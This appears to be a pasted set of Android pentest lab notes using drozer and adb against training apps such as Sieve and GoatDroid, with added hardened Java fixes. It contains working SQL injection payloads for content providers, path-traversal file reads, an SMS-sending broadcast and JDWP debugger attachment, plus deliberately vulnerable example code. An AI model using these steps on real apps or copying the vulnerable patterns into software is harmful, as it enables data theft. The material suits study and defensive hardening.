Untitled

a guest
Dec 8th, 2017

Starting a drozer session (forward the drozer agent's port 31415 from the device)

$ adb forward tcp:31415 tcp:31415

Connecting to the drozer agent

$ drozer console connect

Retrieving Package Information

dz> run app.package.list -f sieve

We can ask drozer to provide some basic information about the package using the `app.package.info` command:

dz> run app.package.info -a com.mwr.example.sieve

Identify the Attack Surface

dz> run app.package.attacksurface com.mwr.example.sieve

Launching Activities

dz> run app.activity.info -a com.mwr.example.sieve

Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList

Since the PWList activity is exported and does not require any permission, we can ask drozer to launch it:

dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

Reading from Content Providers

dz> run app.provider.info -a com.mwr.example.sieve

Database-backed Content Providers (Data Leakage)

drozer provides a scanner module that brings together various ways to guess paths and divine a list of accessible content URIs:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/ ...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
email: incognitoguy50@gmail.com

Database-backed Content Providers (SQL Injection)

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

Android returns a very verbose error message, showing the entire query that it tried to execute.
We can fully exploit this vulnerability to list all tables in the database, and then read the Key table:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

File System-backed Content Providers

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

To download the database to the local machine:

dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

Content Provider Vulnerabilities

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
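
The injection reported by scanner.provider.injection above, and the --projection / --selection queries in the SQL injection section earlier, both come from a query() implementation that pastes caller-supplied strings into SQL text. The following is an added example written for this page, not code from the Sieve app or from drozer: the vulnerable pattern next to a hardened query() built on SQLiteQueryBuilder with a projection map and strict mode. Table and column names follow the drozer output above; PasswordDbHelper is an assumed SQLiteOpenHelper, and the provider is assumed to be declared in the manifest with android:exported="false" or a permission, which the query hardening complements rather than replaces.

```java
// Added example for this page; not Sieve or drozer code.
// Assumptions: a "Passwords" table with the columns shown by app.provider.query
// (id, service, username, password, email) and an app-supplied SQLiteOpenHelper
// named PasswordDbHelper.
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.text.TextUtils;

import java.util.HashMap;
import java.util.Map;

public class PasswordsProvider extends ContentProvider {
    private static final String TABLE = "Passwords";

    // Allow-list of columns a caller may name; any other token in the
    // projection is rejected before it reaches SQL.
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static {
        for (String col : new String[] {"id", "service", "username", "password", "email"}) {
            PROJECTION_MAP.put(col, col);
        }
    }

    private PasswordDbHelper helper; // assumed SQLiteOpenHelper from the app

    @Override
    public boolean onCreate() {
        helper = new PasswordDbHelper(getContext());
        return true;
    }

    // VULNERABLE (kept for contrast, not wired to the provider): the caller's
    // projection and selection become part of the SQL string. A projection of
    // "* FROM SQLITE_MASTER WHERE type='table';--" therefore rewrites the
    // statement, which is what scanner.provider.injection reports, and a lone
    // "'" produces the verbose SQLiteException that quotes the whole query.
    Cursor queryVulnerable(String[] projection, String selection, String[] selectionArgs) {
        SQLiteDatabase db = helper.getReadableDatabase();
        String cols = (projection == null) ? "*" : TextUtils.join(", ", projection);
        String sql = "SELECT " + cols + " FROM " + TABLE
                + (selection == null ? "" : " WHERE " + selection);
        return db.rawQuery(sql, selectionArgs);
    }

    // HARDENED: SQLiteQueryBuilder with a projection map and strict mode.
    // With a projection map set, an unknown column throws IllegalArgumentException
    // instead of being spliced in; strict mode makes the builder validate the
    // selection as one parenthesised SQL expression, so "'" and ";--" style
    // inputs are refused; values arrive through selectionArgs as bound
    // parameters, never as SQL text.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE);
        qb.setProjectionMap(PROJECTION_MAP);
        qb.setStrict(true); // available since API level 14
        SQLiteDatabase db = helper.getReadableDatabase();
        Cursor c = qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
        c.setNotificationUri(getContext().getContentResolver(), uri);
        return c;
    }

    // Writes are deliberately not offered through the provider in this example.
    @Override public Uri insert(Uri uri, ContentValues values) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) { throw new UnsupportedOperationException(); }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.password"; }
}
```

Against the hardened query(), the --projection "* FROM SQLITE_MASTER ..." request fails with "Invalid column" before any SQL runs, and the --selection "'" request fails validation without the statement text being echoed back; rerunning scanner.provider.injection is the quickest way to confirm both findings are gone.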

To test for local file inclusion, path traversal or reading of local files via vulnerable content providers in the app:

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

To read a file through a vulnerable provider:

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
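
The traversal finding above, and the app.provider.read / app.provider.download commands in the file-system-backed provider section, come from an openFile() that turns the URI path straight into a filesystem path. The following is an added example written for this page, not the Sieve FileBackupProvider's code: the vulnerable pattern next to an openFile() that confines requests to one directory. The base directory (a backups folder under the app's private files directory) and the class name are assumptions chosen for the example; as with the database provider, the complete fix also means not exporting the provider without a permission.

```java
// Added example for this page; not Sieve or drozer code.
// Assumption: the provider is only meant to serve files under
// <app private files dir>/backups; that policy is chosen for this example.
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;
import android.os.ParcelFileDescriptor;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

public class BackupFileProvider extends ContentProvider {

    // VULNERABLE (kept for contrast): the URI path is used as the file path,
    // so content://<authority>/etc/hosts opens /etc/hosts and a path such as
    // /data/data/<pkg>/databases/database.db hands out the app's own database,
    // which is what app.provider.read and app.provider.download rely on above.
    ParcelFileDescriptor openFileVulnerable(Uri uri) throws FileNotFoundException {
        File f = new File(uri.getPath());
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // HARDENED: resolve the request beneath a fixed base directory, canonicalise
    // it (this collapses ".." and follows symlinks) and refuse anything that does
    // not stay inside that directory. The mode string is parsed by the platform
    // helper, so write access is only granted if the provider chooses to allow it.
    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        File base = new File(getContext().getFilesDir(), "backups");
        File target = resolveInside(base, uri.getPath());
        if (target == null) {
            // Do not echo the resolved filesystem path back to the caller.
            throw new FileNotFoundException("Not available through this provider: " + uri.getLastPathSegment());
        }
        return ParcelFileDescriptor.open(target, ParcelFileDescriptor.parseMode(mode)); // API 19+
    }

    // Containment check, kept free of Android types so it can be unit tested on
    // the JVM: returns the canonical file when it lies inside base, else null.
    // File(File, String) treats an absolute child such as "/etc/hosts" as
    // relative to base, so only ".." segments and symlinks could escape, and
    // getCanonicalPath() resolves both before the prefix comparison.
    static File resolveInside(File base, String requested) {
        if (requested == null) {
            return null;
        }
        try {
            String baseCanon = base.getCanonicalPath();
            String canon = new File(base, requested).getCanonicalPath();
            boolean inside = canon.equals(baseCanon) || canon.startsWith(baseCanon + File.separator);
            return inside ? new File(canon) : null;
        } catch (IOException e) {
            return null;
        }
    }

    // The example serves files only; the cursor-style methods are not offered.
    @Override public boolean onCreate() { return true; }
    @Override public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) { return null; }
    @Override public String getType(Uri uri) { return "application/octet-stream"; }
    @Override public Uri insert(Uri uri, ContentValues values) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) { throw new UnsupportedOperationException(); }
}
```

With this in place the /etc/hosts request and the ../-style paths both resolve to nothing inside the backups directory and are refused, and scanner.provider.traversal no longer lists the provider; the prefix comparison includes the separator so a sibling directory such as backups2 does not pass as "inside".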

Interacting with Services

dz> run app.service.info -a com.mwr.example.sieve

Unintended Data Leakage

pidcat

$ pidcat com.mwr.example.sieve

Insecure Data Storage

root@cancro:/data/data/com.jianguo.funcontrol/shared_prefs # ls -al
ls -al
-rw-rw---- u0_a216 u0_a216 124 2015-12-19 13:51 AGREE_PROTOCOL.xml
-rw-rw---- u0_a216 u0_a216 799 2016-02-06 18:42 CoreServicePrefs.xml
-rw-rw---- u0_a216 u0_a216 127 2016-01-31 17:09 WebViewChromiumPrefs.xml
-rw-rw---- u0_a216 u0_a216 226 2016-02-06 17:09 com.iflytek.msc.xml
-rw-rw---- u0_a216 u0_a216 133 2016-01-31 17:09 com.jianguo.funcontrol_preferences.xml
-rw-rw---- u0_a216 u0_a216 72801 2016-02-06 17:09 moive.sp.xml
-rw-rw---- u0_a216 u0_a216 942 2016-02-06 18:42 umeng_general_config.xml

root@cancro:/data/data/com.mwr.example.sieve # ls -al
ls -al
drwxrwx--x u0_a188 u0_a188 2015-08-03 20:51 cache
drwxrwx--x u0_a188 u0_a188 2016-06-30 00:02 code_cache
drwxrwx--x u0_a188 u0_a188 2014-08-01 22:32 databases
lrwxrwxrwx root root 2016-06-29 22:36 lib -> /data/app-lib/com.mwr.example.sieve-1

Insufficient Transport Layer Protection

Burp Suite

Unintended Data Leakage

Input entered in the login form: 123456. The pidcat capture below shows it written to the log in clear text under the m_MainLogin tag:

root@ubuntu:~# pidcat.py com.mwr.example.sieve

art I Late-enabling -Xcheck:jni
BoostFramework V mAcquireFunc method = public int com.qualcomm.qti.Performance.perfLockAcquire(int,int[])
V mReleaseFunc method = public int com.qualcomm.qti.Performance.perfLockRelease()
V mAcquireTouchFunc method = public int com.qualcomm.qti.Performance.perfLockAcquireTouch(android.view.MotionEvent,android.util.DisplayMetrics,int,int[])
V mIOPStart method = public int com.qualcomm.qti.Performance.perfIOPrefetchStart(int,java.lang.String)
V mIOPStop method = public int com.qualcomm.qti.Performance.perfIOPrefetchStop()
V BoostFramework() : mPerf = com.qualcomm.qti.Performance@817a13
V BoostFramework() : mPerf = com.qualcomm.qti.Performance@804f450
OpenGLRenderer D Use EGL_SWAP_BEHAVIOR_PRESERVED: true
Adreno-EGL I <qeglDrvAPI_eglInitialize:379>: EGL 1.4 QUALCOMM build: Nondeterministic_AU_msm8974_LA.BF.1.1.3_RB1__release_AU (Ia10634f51b)
I OpenGL ES Shader Compiler Version: E031.29.00.00
I Build Date: 01/10/16 Sun
I Local Branch: mybranch17687478
I Remote Branch: quic/LA.BF.1.1.3_rb1.8
I Local Patches: NONE
I Reconstruct Branch: NOTHING
OpenGLRenderer I Initialized EGL, version 1.4
ActivityThread D Loading provider com.mwr.example.sieve.DBContentProvider: com.mwr.example.sieve.DBContentProvider
m_MainLogin D String enetered: 123456
Timeline I Timeline: Activity_launch_request time:7110102
BoostFramework V BoostFramework() : mPerf = com.qualcomm.qti.Performance@c941a0f
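
The m_MainLogin line shows the login input written to logcat in clear text, which any process able to read the log (a connected adb session, or on Android versions before 4.1 any app holding READ_LOGS) can collect with pidcat as above. The following is an added example, not part of the page, of pidcat or of the Sieve app: a small offline checker that runs the same search over pidcat-style output automatically, so captures from a test session can be reviewed for leaked input. The sample lines are constructed from the capture above and the keyword list is an assumption to extend per application.

```java
// Added example for this page; not part of pidcat or of the Sieve app.
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class LogLeakScanner {

    // pidcat prints "<tag> <level> <message>" and omits the tag on consecutive
    // lines from the same tag, so the tag group may be empty.
    private static final Pattern LINE = Pattern.compile("^(\\S*)\\s*([VDIWEF])\\s(.*)$");

    // Keywords that commonly precede a sensitive value in developer logging,
    // followed by ':' or '=' and the value. This list is an assumption to tune
    // per application; "eneter" covers the misspelt message in the capture.
    private static final Pattern SENSITIVE = Pattern.compile(
            "(?i)\\b(pass\\w*|pin|token|secret|otp|cvv|enter\\w*|eneter\\w*)\\s*[:=]\\s*(\\S+)");

    /** One flagged log line: where it came from and what appears to have leaked. */
    public static final class Finding {
        public final String tag;
        public final String level;
        public final String keyword;
        public final String value;

        Finding(String tag, String level, String keyword, String value) {
            this.tag = tag;
            this.level = level;
            this.keyword = keyword;
            this.value = value;
        }

        @Override
        public String toString() {
            return "tag=" + tag + " level=" + level + " keyword=" + keyword + " value=" + value;
        }
    }

    /** Scan pidcat-style lines; the last seen tag is carried across tag-less lines. */
    public static List<Finding> findLeaks(String[] lines) {
        List<Finding> findings = new ArrayList<>();
        String currentTag = "";
        for (String line : lines) {
            Matcher m = LINE.matcher(line);
            if (!m.matches()) {
                continue; // not a log record (a prompt, a blank line, ...)
            }
            if (!m.group(1).isEmpty()) {
                currentTag = m.group(1);
            }
            Matcher s = SENSITIVE.matcher(m.group(3));
            if (s.find()) {
                findings.add(new Finding(currentTag, m.group(2), s.group(1), s.group(2)));
            }
        }
        return findings;
    }

    // Constructed sample, abridged from the pidcat capture above.
    static final String[] SAMPLE = {
        "OpenGLRenderer D Use EGL_SWAP_BEHAVIOR_PRESERVED: true",
        "ActivityThread D Loading provider com.mwr.example.sieve.DBContentProvider: com.mwr.example.sieve.DBContentProvider",
        "m_MainLogin D String enetered: 123456",
        "Timeline I Timeline: Activity_launch_request time:7110102",
        "BoostFramework V BoostFramework() : mPerf = com.qualcomm.qti.Performance@c941a0f",
    };

    public static void main(String[] args) {
        for (Finding f : findLeaks(SAMPLE)) {
            System.out.println(f);
        }
    }
}
```

On the sample only the m_MainLogin record is reported; in practice feed findLeaks() the lines of a saved pidcat capture and restrict the tags to the application's own ones, since framework and vendor tags produce most of the noise. The remediation on the app side is simply not to log credentials at all, which is also what removes the finding.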

Attacking Services

dz> run app.service.info --package org.owasp.goatdroid.fourgoats
Package: org.owasp.goatdroid.fourgoats
org.owasp.goatdroid.fourgoats.services.LocationService
Permission: null

Attacking Activities

List the activities declared in the AndroidManifest.xml file, including unexported ones:

dz> run app.activity.info -a org.owasp.goatdroid.fourgoats -u
Package: org.owasp.goatdroid.fourgoats
Exported Activities:
org.owasp.goatdroid.fourgoats.activities.Main
org.owasp.goatdroid.fourgoats.activities.ViewCheckin
org.owasp.goatdroid.fourgoats.activities.ViewProfile
org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication

Launch the component:

dz> run app.activity.start --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.activities.ViewProfile

Attacking Broadcast Receivers

dz> run app.broadcast.info --package org.owasp.goatdroid.fourgoats
Package: org.owasp.goatdroid.fourgoats
org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver
Permission: null

In the AndroidManifest.xml file of the FourGoats application, the receiver is declared with the action name org.owasp.goatdroid.fourgoats.SOCIAL_SMS and the component name org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver, so we have to set these parameters in drozer accordingly:

dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234 --extra string message "it's test"

Or send the broadcast directly with am from an adb shell (this example targets the InsecureBankv2 receiver):

$ adb shell
am broadcast -a theBroadcast -n com.android.insecurebankv2/com.android.insecurebankv2.MyBroadCastReceiver --es phonenumber 5554 --es newpass qwreet@123!

Exploiting Debuggable Applications

adb jdwp lists the PIDs of processes that expose a JDWP debugging port. On a production build only applications built with android:debuggable="true" appear here; on an emulator or an eng/userdebug build every app process does:

$ adb jdwp
347
602
710
724
737
811
929
1202
1320
1362
1383
1405
1931
2022
2207
2222
2239
2253
2269
2283
2310

Map a PID from that list back to its package with ps:

$ adb shell ps | grep '1931'
u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote

C:\Users\syandava\Desktop\sieve\dist
$ adb shell ps | grep sieve
u0_a59 1320 177 570756 43612 ffffffff b769007b S com.mwr.example.sieve
u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote

run-as switches to the package's user and can list its private data directory (the shell is already root here; on a non-rooted device run-as only works for debuggable packages):

$ adb shell
root@vbox86p:/ # run-as com.mwr.example.sieve
run-as com.mwr.example.sieve
root@vbox86p:/data/data/com.mwr.example.sieve $ ls -l
ls -l
drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 cache
drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 databases
lrwxrwxrwx install install 2017-12-05 22:42 lib -> /data/app-lib/com.mwr.example.sieve-1
root@vbox86p:/data/data/com.mwr.example.sieve $ exit
exit
root@vbox86p:/ # exit
exit

run-as executes its trailing argument as a command; passing a directory instead of a command therefore fails:

C:\Users\syandava\Desktop\sieve\dist
$ adb shell run-as com.mwr.example.sieve /data/data/
run-as: exec failed for /data/data/ Error:Permission denied

Other ways to attach a debugger

$ adb jdwp

Next we'll need to forward our debugging session to a port we can connect to with our debugger:

$ adb forward tcp:8000 jdwp:498

Finally we can attach the debugger with:

$ jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000
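
The adb jdwp, run-as and jdb steps above only work against a process whose application is debuggable. As an added example written for this page (not from the page, from Sieve or from drozer), the check below lets an app report at startup whether it shipped with android:debuggable="true" and whether a JDWP debugger is attached, so a debuggable release build is caught in testing rather than in the field. The class name is an assumption; the calls are the standard android.content.pm.ApplicationInfo and android.os.Debug APIs.

```java
// Added example for this page; not Sieve or drozer code.
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.os.Debug;

public final class DebugExposure {
    private DebugExposure() {}

    // True when the running build carries android:debuggable="true". Such a
    // process advertises a JDWP port (it is listed by `adb jdwp`), accepts
    // `run-as <package>` from the shell user, and can be attached with jdb.
    public static boolean isDebuggable(Context ctx) {
        ApplicationInfo info = ctx.getApplicationInfo();
        return (info.flags & ApplicationInfo.FLAG_DEBUGGABLE) != 0;
    }

    // True when a JDWP debugger is attached right now, or the VM is paused
    // waiting for one (for example after `adb forward tcp:8000 jdwp:<pid>`
    // followed by the jdb -connect command above).
    public static boolean isDebuggerAttached() {
        return Debug.isDebuggerConnected() || Debug.waitingForDebugger();
    }

    /**
     * Startup self-check: returns a short status string suitable for logging
     * or telemetry. It fails loudly (IllegalStateException) only when the
     * caller states the build is supposed to be a release build and the
     * debuggable flag is nevertheless set, which is the configuration
     * mistake the jdwp section above depends on.
     */
    public static String checkAtStartup(Context ctx, boolean expectRelease) {
        boolean debuggable = isDebuggable(ctx);
        boolean attached = isDebuggerAttached();
        String status = "debuggable=" + debuggable + " debugger_attached=" + attached;
        if (expectRelease && debuggable) {
            throw new IllegalStateException("Release build is debuggable: " + status);
        }
        return status;
    }
}
```

Call DebugExposure.checkAtStartup(this, !BuildConfig.DEBUG) from Application.onCreate(), using the BuildConfig class that Gradle generates for the app: a correctly built release APK returns "debuggable=false debugger_attached=false", and a release build that was accidentally signed with debuggable="true" throws before it reaches users.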